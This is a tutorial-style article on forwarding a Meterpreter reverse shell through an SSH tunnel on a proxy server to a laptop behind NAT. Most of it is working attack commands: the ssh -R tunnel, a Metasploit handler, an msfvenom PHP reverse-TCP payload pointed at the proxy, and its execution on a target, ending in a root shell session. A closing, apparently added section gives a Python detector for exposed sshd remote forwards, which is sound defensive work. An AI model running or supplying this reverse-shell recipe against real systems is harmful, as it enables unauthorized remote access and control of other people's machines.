Forwarding Meterpreter to your Laptop
Let's say we want a reverse shell (through Meterpreter), but we don't want to run Metasploit on our servers. We want it on our laptop, but unfortunately the laptop does not have a public-facing IP. In this article, I will show how to use our server as a proxy that connects the reverse shell from our target to our laptop sitting behind NAT.
# set up the SSH tunnel (-N: no remote command, -f: go to background after connecting)
laptop:$ ssh -R 0.0.0.0:8080:127.0.0.1:1337 -Nf [email protected]_server

# listen for meterpreter connection
laptop:$ msfconsole
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set LHOST 127.0.0.1
msf5 exploit(multi/handler) > set LPORT 1337
msf5 exploit(multi/handler) > set payload php/meterpreter_reverse_tcp
msf5 exploit(multi/handler) > exploit -j
Next, let's generate the payload and have our target execute it.
# generate payload (written to payload.php, the file copied below)
laptop:$ msfvenom -p php/meterpreter_reverse_tcp \
    LHOST=proxy_server \
    LPORT=8080 > payload.php

# move payload to target server
laptop:$ scp payload.php target:payload.php

# execute payload in target server
target:$ php payload.php
Then boom
msf5 exploit(multi/handler) >
[*] Meterpreter session 1 opened

msf5 exploit(multi/handler) > sessions

Active sessions
===============

  Id  Name  Type                   Information               Connection
  --  ----  ----                   -----------               ----------
  1         meterpreter php/linux  root (0) @ f62342bbe4ce   127.0.0.1:1337 -> 127.0.0.1:51306 (127.0.0.1)

msf5 exploit(multi/handler) > sessions 1
[*] Starting interaction with 1...

meterpreter > shell
Process 121 created.

whoami
root
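Seen from the proxy server, the tunnel above is an sshd-owned listener on a non-loopback address. The following is an added example, not part of the original article, that flags such listeners in `ss -H -tlnp` output; the sample lines, PIDs and function names are constructed for illustration.

```python
import ipaddress
import re

# Constructed sample of `ss -H -tlnp` output from a hypothetical proxy server.
SAMPLE_SS = """\
LISTEN 0 128 0.0.0.0:22 0.0.0.0:* users:(("sshd",pid=812,fd=3))
LISTEN 0 128 0.0.0.0:8080 0.0.0.0:* users:(("sshd",pid=2291,fd=9))
LISTEN 0 128 127.0.0.1:6010 0.0.0.0:* users:(("sshd",pid=2291,fd=11))
LISTEN 0 511 0.0.0.0:80 0.0.0.0:* users:(("nginx",pid=640,fd=6))
LISTEN 0 128 [::]:22 [::]:* users:(("sshd",pid=812,fd=4))
"""

PROC_RE = re.compile(r'\("([^"]+)",pid=(\d+)')


def is_loopback(addr):
    """True for 127.0.0.0/8 and ::1; wildcards ('*', 0.0.0.0, ::) are not."""
    addr = addr.strip("[]").split("%")[0]  # drop IPv6 brackets and %iface
    if addr == "*":
        return False
    return ipaddress.ip_address(addr).is_loopback


def exposed_ssh_forwards(ss_output, sshd_ports=(22,)):
    """Return (address, port, pid) for listeners owned by an sshd process
    that are neither the daemon's own port nor bound to loopback."""
    findings = []
    for line in ss_output.splitlines():
        fields = line.split()
        if len(fields) < 6 or fields[0] != "LISTEN":
            continue  # header, blank line, or socket without process info
        addr, _, port = fields[3].rpartition(":")
        for name, pid in PROC_RE.findall(" ".join(fields[5:])):
            # Names starting with "sshd" cover per-session helper processes.
            if not name.startswith("sshd"):
                continue
            if int(port) in sshd_ports or is_loopback(addr):
                continue
            findings.append((addr, int(port), int(pid)))
    return findings


if __name__ == "__main__":
    for addr, port, pid in exposed_ssh_forwards(SAMPLE_SS):
        print(f"sshd pid {pid} listens on {addr}:{port} (possible remote forward)")
```

With sshd's default `GatewayPorts no`, a remote forward binds to loopback only, so a hit here also means that setting has been relaxed on the host.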